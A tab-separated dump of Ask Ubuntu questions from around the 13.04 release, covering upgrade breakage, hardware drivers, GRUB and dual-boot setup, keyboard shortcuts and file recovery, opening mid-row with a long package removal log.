0.3.8-4.1ubuntu1 ] remv hugin [ 2011.4.0+dfsg-5ubuntu2 ] remv hugin-tools [ 2011.4.0+dfsg-5ubuntu2 ] remv hugin-data [ 2011.4.0+dfsg-5ubuntu2 ] remv ipython [ 0.13.2-1 ] remv steam : i386 [ 1.0.0.36 ] remv steam-launcher [ 1.0.0.36 ] remv jockey-kde [ 0.9.7-0ubuntu13 ] remv jockey-common [ 0.9.7-0ubuntu13 ] remv kde-config-touchpad [ 0.8.1-1ubuntu3 ] remv kubuntu-netbook-default-settings [ 1:13.04ubuntu11 ] remv kubuntu-settings-netbook [ 1:13.04ubuntu11 ] remv kubuntu-settings-desktop [ 1:13.04ubuntu11 ] remv landscape-client-ui-install [ 12.12-0ubuntu3 ] remv pdftk [ 1.44-7 ] remv libgcj12 [ 4.6.4-1ubuntu1 ] remv libgcj-common [ 1:4.7.3-1ubuntu10 ] remv libglade2-dev [ 1:2.6.4-1ubuntu2 ] remv libpurple-bin [ 1:2.10.7-0ubuntu4.1 ] remv meld [ 1.6.1-1 ] remv muon-notifier [ 2.0.0-0ubuntu3.1 ] remv nmap [ 6.00-0.3 ] remv npm [ 1.1.4~dfsg-2 ] remv nodejs-dev [ 0.6.19~dfsg1-5ubuntu1 ] remv nvidia-settings-313 [ 313.30-0ubuntu1~xedgers~quantal1 ] remv openshot [ 1.4.3-1 ] remv openstv [ 1.6.1-1 ] remv pastebinit [ 1.3-4ubuntu1 ] remv picard [ 1.1-0ubuntu3 ] remv plasma-widget-facebook [ 1.0-0ubuntu1 ] remv plasma-scriptengine-python [ 4:4.10.2-0ubuntu2 ] remv playonlinux [ 4.1.8 ] remv rastertosag-gdi [ 0.1-3 ] remv printer-driver-sag-gdi [ 0.1-3 ] remv pylint [ 0.26.0-1ubuntu1 ] remv sublime-text-2-beta [ 2.0.1-1~webupd8~quantal ] remv sublime-text [ 2.0.1-1~webupd8~quantal ] remv xpra [ 0.3.11+dfsg-1 ] remv userconfig [ 0.9.0-0ubuntu11 ] remv ubuntuone-couch [ 0.3.0-0ubuntu5 ] remv stgit [ 0.15-1.1 ] remv quickly [ 12.08.1-0ubuntu2 ] remv python-xlib [ 0.14+20091101-1 ] remv python-wxgtk2.8 [ 2.8.12.1-11ubuntu4 ] remv python-wxversion [ 2.8.12.1-11ubuntu4 ] remv python-wimpiggy [ 0.3.11+dfsg-1 ] remv python-virtkey [ 0.63.0-0ubuntu1 ] remv python-uno [ 1:4.0.2-0ubuntu1 ] remv python-telepathy [ 0.15.19-2.1build1 ] remv python-matplotlib [ 1.2.1-0ubuntu1 ] remv python-gamin [ 0.1.10-4.1 ] remv python-support [ 1.0.15 ] remv python-software-properties [ 0.92.17 ] remv python-simplegeneric [ 0.8.1-1 ] remv quickly-widgets [ 12.03 ] remv python-quickly.widgets [ 12.03 ] remv python-quickly-core [ 12.08.1-0ubuntu2 ] remv python-quickly-common [ 12.08.1-0ubuntu2 ] remv python-pytools [ 2011.5-2 ] remv python-pygame [ 1.9.1release+dfsg-8 ] remv python-pyaudio [ 0.2.7-1 ] remv python-pyatspi2 [ 2.7.91+dfsg-0ubuntu1 ] remv python-pyatspi [ 2.7.91+dfsg-0ubuntu1 ] remv python-pip [ 1.3.1-0ubuntu1 ] remv python-opengl [ 3.0.1-1 ] remv python-mlt5 [ 0.8.8-1 ] remv python-libtorrent [ 0.16.7-0ubuntu1 ] remv python-libproxy [ 0.4.11-0ubuntu1 ] remv python-keybinder [ 0.3.0-1ubuntu1 ] remv python-kde4 [ 4:4.10.2-0ubuntu1 ] remv python-jsonrpc2 [ 0.3.2-3 ] remv python-indicate [ 12.10.1-0ubuntu2 ] remv python-gtksourceview2 [ 2.10.1-2build1 ] remv python-gnupginterface [ 0.3.2-9.1ubuntu3 ] remv python-enchant [ 1.6.5-2build1 ] remv python-central [ 0.6.17ubuntu2 ] remv python-aptdaemon-gtk [ 1.0-0ubuntu9 ] remv python-aptdaemon.gtkwidgets [ 1.0-0ubuntu9 ] remv ttf-mscorefonts-installer [ 3.4+nmu1ubuntu1 ] remv update-notifier-common [ 0.134 ] remv ubuntu-system-service [ 0.2.4 ] remv ssh-import-id [ 3.14-0ubuntu1 ] remv screen-resolution-extra [ 0.15ubuntu1 ] remv python-ubuntuone-client [ 4.2.0-0ubuntu1 ] remv python-ubuntuone-storageprotocol [ 4.2.0-0ubuntu1 ] remv python-twisted-web [ 12.3.0-1 ] remv python-twisted-names [ 12.3.0-1 ] remv python-twisted-core [ 12.3.0-1ubuntu6 ] remv python-launchpadlib [ 1.10.2+ds-1 ] remv python-lazr.restfulclient [ 0.13.1-1 ] remv python-zope.interface [ 4.0.5-0ubuntu1 ] remv zeitgeist [ 0.9.5-0ubuntu1 ] remv zeitgeist-datahub [ 0.9.5-1ubuntu1 ] remv zeitgeist-core [ 0.9.5-0ubuntu1 ] remv python-zeitgeist [ 0.9.5-0ubuntu1 ] remv python-yaml [ 3.10-4build2 ] remv python-xkit [ 0.5.0ubuntu1 ] remv python-configglue [ 1.0-1build1 ] remv python-xdg [ 0.25-2 ] remv python-xapian [ 1.2.12-2 ] remv python-wnck [ 2.32.0+dfsg-2ubuntu1 ] remv python-webkit [ 1.1.8-2ubuntu4 ] remv python-wadllib [ 1.3.2-1 ] remv python-vte [ 1:0.28.2-5ubuntu1 ] remv python-requests [ 1.1.0-1 ] remv python-urllib3 [ 1.5-0ubuntu1 ] remv python-uniconvertor [ 1.1.4-1ubuntu2 ] remv python-tz [ 2012c-1 ] remv python-twisted-bin [ 12.3.0-1ubuntu6 ] remv python-tk [ 2.7.4-0ubuntu1 ] remv python-fixtures [ 0.3.12-0ubuntu2 ] remv python-testtools [ 0.9.24-0ubuntu2 ] remv system-config-printer-common [ 1.3.12+20130308-0ubuntu4 ] remv python-smbc [ 1.0.13-0ubuntu4 ] remv python-aptdaemon.gtk3widgets [ 1.0-0ubuntu9 ] remv python-aptdaemon [ 1.0-0ubuntu9 ] remv python-debian [ 0.1.21+nmu2ubuntu1 ] remv python-six [ 1.2.0-1 ] remv python-qt4 [ 4.10-0ubuntu3 ] remv python-sip [ 4.14.5-0ubuntu1 ] remv python-simplejson [ 2.6.2-1 ] remv python-setuptools [ 0.6.34-0ubuntu1 ] remv python-serial [ 2.6-1 ] remv python-reportlab-accel [ 2.6-1 ] remv python-reportlab [ 2.6-1 ] remv python-renderpm [ 2.6-1 ] remv python-qt4-dbus [ 4.10-0ubuntu3 ] remv python-pyudev [ 0.16.1-1ubuntu1 ] remv python-pyrex [ 0.9.8.5-2ubuntu2 ] remv python-pyparsing [ 1.5.7+dfsg1-0ubuntu2 ] remv python-pyorbit [ 2.24.0-6ubuntu3 ] remv python-pyinotify [ 0.9.3-1.1ubuntu1 ] remv python-pygoocanvas [ 0.14.1-1ubuntu8 ] remv system-config-printer-udev [ 1.3.12+20130308-0ubuntu4 ] remv python-cupshelpers [ 1.3.12+20130308-0ubuntu4 ] remv python-pycurl [ 7.19.0-5ubuntu8 ] remv python-protobuf [ 2.4.1-3ubuntu1 ] remv python-apport [ 2.9.2-0ubuntu8 ] remv python-problem-report [ 2.9.2-0ubuntu8 ] remv python-nose [ 1.1.2-3ubuntu4 ] remv python-lazr.uri [ 1.0.3-1 ] remv python-pkg-resources [ 0.6.34-0ubuntu1 ] remv python-piston-mini-client [ 0.7.5-0ubuntu1 ] remv python-pexpect [ 2.4-1 ] remv python-paramiko [ 1.7.7.1-3.1ubuntu1 ] remv python-pam [ 0.4.2-13ubuntu4 ] remv python-openssl [ 0.13-2ubuntu3 ] remv python-oauthlib [ 0.3.7-0ubuntu1 ] remv python-oauth [ 1.0.1-3build1 ] remv python-numpy [ 1:1.7.1-1ubuntu1 ] remv python-notify [ 0.1.1-3ubuntu1 ] remv python-mutagen [ 1.20-1ubuntu1 ] remv python-memcache [ 1.48-1 ] remv python-lxml [ 3.1.0-1 ] remv python-logilab-astng [ 0.24.1-1ubuntu1 ] remv python-logilab-common [ 0.58.3-1ubuntu1 ] remv python-gst0.10 [ 0.10.22-3ubuntu1 ] remv python-libxml2 [ 2.9.0+dfsg1-4ubuntu4 ] remv python-keyring [ 0.9.2-1ubuntu2 ] remv python-imaging-compat [ 1.1.7+2.0.0-1 ] [ python-imaging : amd64 ] remv python-imaging [ 1.1.7+2.0.0-1 ] remv python-ibus [ 1.4.2-0ubuntu2 ] remv python-httplib2 [ 0.7.7-1 ] remv python-gtk2-doc [ 2.24.0-3ubuntu1 ] remv python-gnomekeyring [ 2.32.0+dfsg-2ubuntu1 ] remv python-glade2 [ 2.24.0-3ubuntu1 ] remv python-gtk2 [ 2.24.0-3ubuntu1 ] remv python-gpgme [ 0.3-0ubuntu1 ] remv python-gobject-2-dev [ 2.28.6-11 ] remv python-appindicator [ 12.10.1daily13.04.15-0ubuntu1 ] remv python-gobject [ 3.8.0-2 ] remv python-gconf [ 2.28.1+dfsg-1build1 ] remv python-gobject-2 [ 2.28.6-11 ] remv python-gi-cairo [ 3.8.0-2 ] remv python-gi [ 3.8.0-2 ] remv python-gdbm [ 2.7.4-0ubuntu1 ] remv python-egenix-mxdatetime [ 3.2.5-1 ] remv python-egenix-mxtools [ 3.2.5-1 ] remv python-django [ 1.4.5-1 ] remv python-distutils-extra [ 2.37-1 ] remv python-dirspec [ 4.2.0-0ubuntu1 ] remv python-all-dev [ 2.7.4-0ubuntu1 ] remv python-dev [ 2.7.4-0ubuntu1 ] remv python-defer [ 1.0.6-2 ] remv python-decorator [ 3.3.3-1 ] remv python-debtagshw [ 1.10.2ubuntu1 ] remv python-dbus [ 1.1.1-1ubuntu3 ] remv python-dateutil [ 1.5+dfsg-0.1 ] remv python-cups [ 1.9.62-0ubuntu3 ] remv python-crypto [ 2.6-4 ] remv python-bzrlib [ 2.6.0~bzr6571-4ubuntu2 ] remv python-configobj [ 4.7.2+ds-4 ] remv python-chardet [ 2.0.1-2build1 ] remv python-cairo [ 1.8.8-1ubuntu4 ] remv python-boto [ 2.3.0-1 ] remv python-apt [ 0.8.8ubuntu6 ] remv python-all [ 2.7.4-0ubuntu1 ] remv python [ 2.7.4-0ubuntu1 ] what is going on there ? why is it nuking the entire system ?
288937	mp3 reader ( creative zen ) no more mounted after raring upgrade	since i did the upgrade from 12.10 to 13.04 , my creative zen mp3 player is no more seen by ubuntu . it is not mounted at all . however , it is correctly displayed by the lsusb command . what should i do ?
288939	disk and ram memory size	i need to know the disk size and the ram size of lamp + chrome . how can i check it ... on ubuntu 11.x and 12.x thanks
288940	how do i configure ipv4 connection to use a dns accessible only over ipv6 ?	i 'm trying to make my system resolve ipv4 addresses over an ipv6 connection because my ipv6 connection is more secure ( yes , it really is . long story ) . the ipv6 nameserver resolves ipv4 addresses ; it works fine with `` dig '' command-line tool . however , networkmanager gui does n't accept ipv6 addresses for ipv4 dns . some guides advise to edit /etc/resolv.conf , but on ubuntu that file has a notice that the file will be overwritten and should not be edited . is there any way to convince some part of networkmanager that i really actually want it to use ipv6 dns for ipv4 ? or maybe there 's some file other than /etc/resolv.conf ? for the record , i 'm on ubuntu 12.04 ( precise ) .
288944	battery life in ubuntu 12.10 & 12.04	i am starting software developer . i have a dual boot system on my leptop . i installed ubuntu 12.10 and found that battery life is pretty short then in windows . i followed the instructions related to same problems like mine , but it was useless . i thought that problem is on ubuntu itself . and installed an older version of ubuntu ( 12.04 ) . again the same storey . how can i reach same battery life in ubuntu like in windows ? my leptop model : hp probook 4530s
288946	how to disable animations in ubuntu 13.04	i updated to 13.04 few days ago . after that when i switch windows with alt+tab , press windows key call the dash window , or switch workspace , there 's always a 5 secs delay i ca n't do anything . maybe my computer is too old . but there 's no problem in 12.10 . i disabled the animation and face windows in ccsm , and window snapping feature in unity tweak tool but nothing changed . i doubt it is the fading animation about the alt+tab window . just a guess .
288947	is there any application for editing the file type associations ?	somehow , on my computer at work the default application for jpg files is ... wine ! wine is not even installed anymore . i can `` open with '' other applications . but no matter what i 've tried `` wine '' still remains the default . i want to completely delete the `` wine '' from the list of applications that can open jpg . is there any application that would allow me full access ( see , edit , delete ) to all the file associations for all the file types ?
288956	after login there is a strange window asking for a password	since upgrading to ubuntu 13.04 , i get a window asking for a password for my email address . the window appears after logging into the desktop . the window is titled `` zugangsanfrage '' ( access request ) and `` legitimierungsanfrage '' ( legitimation request ) , asks for the password of the acount my email address , gives no further information and does n't let me do anything until i enter a password or cancel the dialog . it has the option to store the password in the key ring , though . i can start new apps using the starter bar , but i can not use them move windows , or type into other windows . i can not even make a screenshot . i have not even the slightest idea which password to give . does it ask for my web-mail password or for the ubuntu-one password ( where my login is the email address ) or is it just a phishing app ( but how did i get it ) . i tried entering some random characters and it is happy . update : i added a screenshot :
288958	what do the listed unity lenses do ?	ubuntu 12.04 synaptic package manager shows these unity lenses : unity-lens-applications unity-lens-files unity-lens-music unity-lens-video what do the lenses do ? and do they send dash searches or any other searches to ubuntu servers or other servers ?
288962	software update stuck in the middle . 13.04	so i finally installed ubuntu 13.04 . everthing was fine , until i tried to update software . i just got this : http : //fc02.deviantart.net/fs70/f/2013/121/f/a/screenshot_from_2013_05_01_11_10_03_by_shardival-d63oprt.png it just stays that all night long .
288963	tp-link tl-wn821n v4 wo n't connect to my wireless	i 've bought a tp-link tl-wn821n special for ubuntu , i was advised that it would work , but it does n't . when i plug in the receiver ubuntu does recognize and i can choose between the networks available . when i type in the password it tries to connect , but after a short time it asks for my password again ! this is the first time i 've ever used ubuntu and i 'm a noob with things like coding : ( i have v4 of the receiver , which is the latest version . and i 'm running stable 13.04 . i can connect to my android portable hotspot though , but i 'm sure i 've entered the correct password to my home wifi regards , joran
288965	how to run a shell script without terminal	i have a shell command that executes a command and sends it through pipe to a python file . the python file does various checks on it and then starts processes with parameters using subprocess.popen . but i see that it only works when i run the entire thing in a shell . is there another way for me to execute it other than shell . if i just run it without any shell or use & to keep it at background , the processes started by python are named defunct in the ps -e table . can someone help ? edit : here is run.sh , which i run : # ! /bin/bash padsp julius -input mic -c $ home/project/julius-grammer/julian.jconf | python -u $ home/project/pythoncontrols/getcommand.py however not all subprocess.popen fail to run . for example , if i use festival program , it runs . however xbacklight does n't . this is getcommand.py : i removed the unnecessary part , and this the one that is necessary , com is string , i know this selection is going on fine . : if ( com == `` complete brightness '' ) : userin = data ( [ `` xbacklight '' , `` -set '' , `` 100 '' ] , '' maximum brightness '' ) userin.interact ( ) if ( com == `` half brightness '' ) : userin = data ( [ `` /usr/bin/xbacklight '' , `` -set '' , `` 50 '' ] , '' partial brightness '' ) userin.interact ( ) if ( com == `` zero brightness '' ) : userin = data ( [ `` /usr/bin/xbacklight '' , '' -set '' , `` 0 '' ] , '' minimal brightness '' ) userin.interact ( ) now coming to the objects , this is how the class goes : class data : def __init__ ( self , com= '' '' , msg= '' '' , sp= '' false '' ) : self.command = com self.message = msg self.speak = sp def interact ( self ) : if self.command ! = `` '' : co = subprocess.popen ( self.command , stdout=subprocess.pipe ) co.wait ( ) if self.speak == true : self.say ( self.message ) else : subprocess.popen ( [ `` notify-send '' , '' syssec '' , self.message ] )
288969	how can we restore if all kernel has removed by mistaken it has raid10	how we can restore the server if we removed the all kernels , and i have the raid 10. in this case i try to recover with live-cd but i am not able to mounting partition because i have raid10 partitions , when i mounting this partitions unknown filesystem raid . mount /dev/sdxy /mnt -t ext4 is this correct command for mount raid10 partitions ?
288971	disable keyboard shortcut ctrl+alt+f11 ( gnome ? )	consider file to be very old and do n't remake it.i 'm a ubuntu noob . appreciate you time . i came across this situation where pressing ctrl+alt+f11 brings up a blank screen with a flashing cursor . i ca n't see where to disable that key combination . any help ? from the link above it seems to be a gnome thing .
288973	evolution after upgradeing to ubuntu 13.04	after upgrading to u 13.04 evolution starts up and immediately shuts down ... ? to send a message from the launch bar is the only activity functioning . any suggestion ? thanks in advance , gerrit
288979	can i install ubuntu ?	i have hp pavilion g4 core i3 notebook with 6 gb ram and 750 gb hard disk . i have 2 windows with dual booting mode windows 7 and windows 8 . my question is that am i install ubuntu on my system as a third operating with triple booting system or not . am i delete the windows 8 from the booting menu and from the system and replace with ubuntu but the dual booting is not going to disturb . i hope i find some answer .
288982	updating quantal 12.10 to raring 13.04 broke seahorse-nautilus	after upgrading from quantal to raring the nautilus-seahorse plugin for gpg encryption cease to work . when right clicking in a file the gui opens and ask to select a key for encryption but the encryption never occurs . it is also impossible to desencrypt a file . the cli works fine , it is only the nautilus ( or now `` files '' ) plugin which does not work . re-installing the plugin and other seahorse files from synaptic did not help . any idea ?
288988	how to connect to existing x session without unlocking physical display ?	i usually leave many programs running on my workstation and sometimes i need to use it remotely . so i need to connect to existing x session , while keeping physical display ( workstation 's monitor ) locked all time . i tried vino ( vino-server & vinagre as client ) , but they open new , empty x session , so it does n't give me access to running applications . i also tried x11vnc but it looks to unlock physical screen and leave it unlocked ( ! ) when client finish , so there we have security issue ... on both ends there is ubuntu 12.04 running , with default gui , so no gnome specific solution will work ( applets , etc. ) . ideal solution should give me access to all programs running on both monitors and several `` virtual desktops '' . which can need capturing of special keys like crtl+ [ number ] and alt-tab . alternatively ... if it is possible to forward existing window ( program already running ) through ssh -x it will be a good workaround . edit : x1vnc , not `` x11server '' of course ...
288997	file explorer : can not open a folder like a tree in ubuntu 13.04	i have updated my computer to ubuntu 13:04 and i have noticed that in nautilus i can not open a folder with the tree icon there was on the left in the previous version . with this option is easy to explore some folders remaining in the same folder with less effort . i could n't find any option in the preferences . is there an option to recover this functionality ? thanks for your help
288998	ca n't log-in with clean ubuntu 13.04 install ( graphic problem ? )	i recently installed ubuntu 13.04 on my old pc , as my `` new '' notebook is under maintenance ( ad it will take a while to have it back ) . in this post , i 'll try to describe my problem in the detaildest way . the system amd athlon 64 x2 3800+ ( dual core ) nvidia geforce 6200se ( with turbocache ) ubuntu 13.04 32-bit ( i ca n't download a 64-bit edition at the moment , as i ca n't use such an amount of my monthly traffic ) - no updated was installed installation strange behavior from the beginning , live dvd was behaving in a strange way . the first screen after selecting dvd-boot , was a violet screen with a keyboard icon on the bottom . i tried to press some arrows and waited , then some random keys and waited , and so on and so forth ... but this was simply unuseful : nothing happend . i decided to reboot and wait . ubuntu started loading in some seconds and after a long wait , i was able to see the install menu . i thought it was a graphic-connected problem . in fact , i noticed that the copying and installing operations ended in a short time , in contrast with the extremely slow loading of the slides that present ubuntu 's features during installation . the problem when i select ubuntu from the grub menu , the log-in screen is loaded in short time . but when i confirm the log-in credentials , everything disappears and the screen shows the mouse pointer above the ubuntu background ( with `` ubuntu 13.04 '' on the lower left side of the screen ) . moving the mouse causes the screen to blink ( rapidly changing from black to the background ) in an irregular manner . that 's it , nothing else appears and the hd does n't work intensively , as usually when ubuntu is loaded . the only way to access the system is to use a non-graphical console . notes windows xp partition works . this makes me think that the problem should n't be some broken hardware . i 'm not able to connect to the internet through ubuntu , as the connection interface given by my isp is graphical and ca n't be started in terminal-only mode ( at least , they do n't furnish terminal-only interface specifications ) . i found that it 's possible to generate a download-list using apt-get with a script like the following : sudo apt-get package1 package2 packagen -- allow-unauthenticated -y -- print-uris | grep -o '\'http . *\ ' | tr `` \ ' '' `` `` > download-list.txt in this manner i will be able to satisfy dependencies from windows ( hopefully a temporary solution ) thank you for reading this . i hope you 'll help me find a solution : )
288999	ubuntu 13.04 not detecting windows 7 during install	i am trying to install the latest ubuntu 13.04 on my netbook but the installation is not able to detect any operating system installed on the machine . and asking me to either wipe out the whole disk or repartition it . i have already installed windows 7 strater , android x-86 and meego installed on my system . during install it says `` this computer currently has no detected operating system '' here is the output of sudo sfdisk -lus & & sudo fdisk -l : disk /dev/sda : 30401 cylinders , 255 heads , 63 sectors/track warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sda1 * 2048 411647 409600 7 hpfs/ntfs/exfat /dev/sda2 411648 396642303 396230656 7 hpfs/ntfs/exfat /dev/sda3 396646337 488392064 91745728 f w95 ext 'd ( lba ) /dev/sda4 457453632 474062084 16608453 7 hpfs/ntfs/exfat /dev/sda5 396646400 440594431 43948032 7 hpfs/ntfs/exfat /dev/sda6 440594433 441004034 409602 83 linux /dev/sda7 441004036 442028037 1024002 82 linux swap / solaris /dev/sda8 442028039 457453567 15425529 83 linux disk /dev/sdb : 1022 cylinders , 124 heads , 62 sectors/track warning : the partition table looks like it was made for c/h/s=*/255/63 ( instead of 1022/124/62 ) . for this listing i 'll assume that geometry . units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sdb1 * 63 7864319 7864257 b w95 fat32 end : ( c , h , s ) expected ( 489,135,30 ) found ( 208,254,63 ) /dev/sdb2 0 - 0 0 empty /dev/sdb3 0 - 0 0 empty /dev/sdb4 0 - 0 0 empty disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9c5506cc device boot start end blocks id system /dev/sda1 * 2048 411647 204800 7 hpfs/ntfs/exfat /dev/sda2 411648 396642303 198115328 7 hpfs/ntfs/exfat /dev/sda3 396646337 488392064 45872864 f w95 ext 'd ( lba ) /dev/sda4 457453632 474062084 8304226+ 7 hpfs/ntfs/exfat /dev/sda5 396646400 440594431 21974016 7 hpfs/ntfs/exfat /dev/sda6 440594433 441004034 204801 83 linux /dev/sda7 441004036 442028037 512001 82 linux swap / solaris /dev/sda8 442028039 457453567 7712764+ 83 linux disk /dev/sdb : 4026 mb , 4026531840 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7864320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 63 7864319 3932128+ b w95 fat32 i have tried this workaround but it is not working in my case . any prompt help would be appreciated . i request moderators to not to immediately close this question even if they think it has been previously solved as those solutions did n't worked for me . thanks in advance . edit : now i have deleted the other two operating systems namely meego and android-x86 but still no avail . the partition table now looks like this . disk /dev/sda : 30401 cylinders , 255 heads , 63 sectors/track units = sectors of 512 bytes , counting from 0 device boot start end # sectors id system /dev/sda1 2048 411647 409600 7 hpfs/ntfs/exfat /dev/sda2 * 411648 396642303 396230656 7 hpfs/ntfs/exfat /dev/sda3 457453637 471796919 14343283 17 hidden hpfs/ntfs /dev/sda4 396644850 488392064 91747215 f w95 ext 'd ( lba ) /dev/sda5 396644913 457450874 60805962 7 hpfs/ntfs/exfat /dev/sda6 471796983 488392064 16595082 7 hpfs/ntfs/exfat please help ! !
289003	where does chromium keep the youtube video files ?	i know that in windows , internet explorer stores .flv temp files in temporary folder ( c : \users\ % username % \appdata\local\microsoft\windows\temporary internet files ) when viewing youtube . and the same make and google chrome in windows ( c : \users\ % username % \appdata\local\google\chrome\user data\default\cache ) . so it 's easy to find a copy of that .flv file . how about chromium in ubuntu ? does it store browsing temp data and where ?
289004	ubuntu is n't on boot	i have windows 7 on my notebook and i installed ubuntu 13.04 in seprate partition from windows 7 and i installed grub on partition of ubuntu . after i restart my pc , it directly go to windows 7 and do n't recognize ubuntu on boot ! what i have to do ?
289005	video flickers when hdmi monitor attached	i 'm running ubuntu 13.04 on my dell latitude e6520 . my video card : vga compatible controller : nvidia corporation gf119m [ nvs 4200m ] ( rev a1 ) when i plug in the hdmi cable for my second monitor , i get a lot of screen flicker . the second monitor works , but the refresh rate is horrible ( i get mouse trails like crazy ) . for the record , this was not a problem with 12.10 , and i did n't have to install any additional drivers with that os -- it ran like a dream out of the box . i 'm not opposed to trying other drivers , just laying down the facts : ) also for the record , i do n't have another type of cable i can try at the moment -- i 'm planning on picking one up today , will report back if it helps . cheers !
289010	gnome documents unable to open documents !	i have an almost default install of gnome documents 3.6.2 on gnome shell 3.6.2 on ubuntu 13.04 . when i open gnome documents , it opens the window with `` new '' and `` recent '' documents showing . by clicking on any document , it just shows 'loading ' . what is missing ? how do i set it right ?
289014	netbook wo n't boot usb	my netbook only shows a blinking dash when booting from removable device . it 's a sony vaio netbook .
289018	how do to install the display drivers for a displaylink usb monitor on 13.04 ?	how do i install the display drivers for a displaylink usb monitor ? the monitor connected with the displaylink device has the following messages on the display : [ 10.723468 ] usb 3-1.1 : device descriptor read/8 , error 110 [ 13.853141 ] nouveau e [ vbios ] [ 0000:01:00.0 ] 0x8569 [ ] : unknown opcode 0xc9 i am running ubuntu 13.04 on a new macbook pro with the nvidia gk107m [ geforce gt 650m mac edition ] graphics card running on the open source nouveau x.org x server display driver . http : //libdlo.freedesktop.org/wiki/ has links to drivers and stuff but no guide for ubuntu versions passed 9.10. i was able to install and test the monitor with libdlo from that page so i figure that it is possible but i do not understand how to install the proper x-drivers to get the display to work normally . synaptic has no results for a search for displaylink .
289019	how to get ubuntu appindicator icon coordinates	i 'm working on ubuntu linux 12.04 and create software built on top of gtk+ 3 using pygobject . i 've got a task of showing popup windows just below the app indicator icon of my application and i ca n't figure out how can i get my app indicator icon coordinates . seems like app_indicator object does not possess gdk window to work with ( or at least it 's not publically visible through its properties ) . i 'd be appreciate for any help or direction of how to get app indicator icon coordinates directly or make some workaround to figure out them .
289023	problems with publishing shared printer in system-config-printer-gnome - ubuntu 10.04.4	so the problem is i ca n't enable the option `` publish shared printers connected to this system '' . i am able to tick the option , but after i do this , it automaticaly closes the window and the option is still unticked . i am running ubuntu 10.04.4 server .
289026	uninstalling firefox means installing kde	i 'm running ubuntu with gnome-shell . for reasons outside of this question , i needed to temporarily uninstall firefox . i had no other browser installed at that time . on entering sudo apt-get remove firefox i was told that doing so would install about 100 packages , mainly associated with kde . i aborted the command and installed epiphany ; then i was able to remove firefox without installing kde.i find this strange . apparently ubuntu wants me to have at least one browser installed ( why ? ) and if i do n't , it wants me to install all ( or most ) of kde . how does this work ? if it is absolutely necessary to have a browser , why not suggest epiphany ? this is ubuntu 13.04 with gnome 3.8 added . it is not a clean install of ubuntu gnome but i have certainly never installed kde .
289027	ca n't seem to get a live pen to boot on my laptop	specs : 989,5 mb ram intel atom cpu n2600 @ 1.60ghz x 4 mesa x11 32 bit flavor 312.2 gb laptop 's outside is carbon fiber . tried putting a live usb pen with fedora in it , but does n't seem to show the pen . and it does n't even have a boot menu ! how can i make it boot from the pen ?
289029	reset keyboard shortcut ( ctrl+f ) in ubuntu 13.04	i 'm running ubuntu 13.04 and in the keyboard shortcut menu i accidentally set one of the shortcuts as ctrl + f , i corrected this . however in applications such as firefox , evince and gedit ctrl + f is no longer opening the search toolbar . even though it is no longer set as a shortcut for anything else . furthermore the find toolbar shortcut is not defined within the keyboard shortcut menu so i can not reset it . how do i reset the keyboard shortcuts to default ? i have found a similar question however all the methods in the answers do not seem relevant to ubuntu 13.04 ( find in applications is not in the menu and gconf is replaced by dconf ) . does anyone know how i can solve this ? thanks in advance !
289030	invalid magic number	i want to install the ubuntukylin 13.04 on a pre-installed win8 system . i follow the installing ubuntu on a pre-installed uefi supported windows 8 system but when i choose to install the ubuntukylin through grub , i get errors . error : invalid magic number . error : please load the kernel first . i install by live usb.and i use linux live usb creator . help .
289031	music cant play and says `` need to install plugins ''	my ubuntu 12.10 rhythm box cant play any songs apart from the ones that were installed with it . it says that no plugins installed and when i try to install them they can not be found
289035	loading grub2 from a different location ?	before i explain my issue , let me start by saying that i am relatively new with ubuntu so please be patient with me ! i had a windows 7 and ubuntu 12.04 dual boot system , and everything was running smoothly . a week or so ago , i decided to install 13.04 alongside of w7 and 12.04 , and since then , i think i am now using grub from a different location . when i only had 12.04 ( prior installing 13.04 ) , i had used grub customizer to add some colour and change the background of my grub boot menu . the grub2 menu that now i see when i boot does not have this customisation . however , when i do boot 12.04 and run grub customizer , i do see the colours/background that i used to see/have when i only had 12.04. s there any way to tell ubuntu to use the grub files that i had customized ? ( ubuntu 12.04 is on sd5 , and 13.04 is on sd8 ) thank you very much in advance ! ! ! dan
289036	recover lost deleted json files on ubuntu 12.04 server ?	i have unknowingly deleted my folder containing json files using rm command on ubuntu 12.04 server . i tried using `` scalpel '' tool but it does not work for json files . is there any other way by which i may recover my lost data . i also tries `` testdisk '' but it throws the error : /proc/sys/kernel/hung_task_timeout_secs error
289039	blank screen on boot after update from 12.10 to 13.04	updated 12.10 to 13.04 . black screen when booting ( nothing shows on screen at all ) goes into log on as i hear the bleep.tried reboot and holding down 1.shift key 2.esc key and 3. holding both down , as per other posts to try and enter grub . help .
289042	python script to change the jack from input to output does not work in 13.04	to change the jack from input to output for any computer or laptop i followed this question : how do i change which audio jacks are used for input and output ? but the python script does not work . this is the message i get : $ sudo python run.py using temporary directory : /dev/shm/hda-analyzer you may remove this directory when finished or if you like to download the most recent copy of hda-analyzer tool . downloading file hda_analyzer.py downloading file hda_guilib.py downloading file hda_codec.py downloading file hda_proc.py downloading file hda_graph.py downloading file hda_mixer.py downloaded all files , executing hda_analyzer.py traceback ( most recent call last ) : file `` /dev/shm/hda-analyzer/hda_analyzer.py '' , line 36 , in < module > from hda_codec import hdacodec , hda_card_list , hda_exporter_pyscript , \ file `` /run/shm/hda-analyzer/hda_codec.py '' , line 330 self.reread ( ) ^ indentationerror : expected an indented block
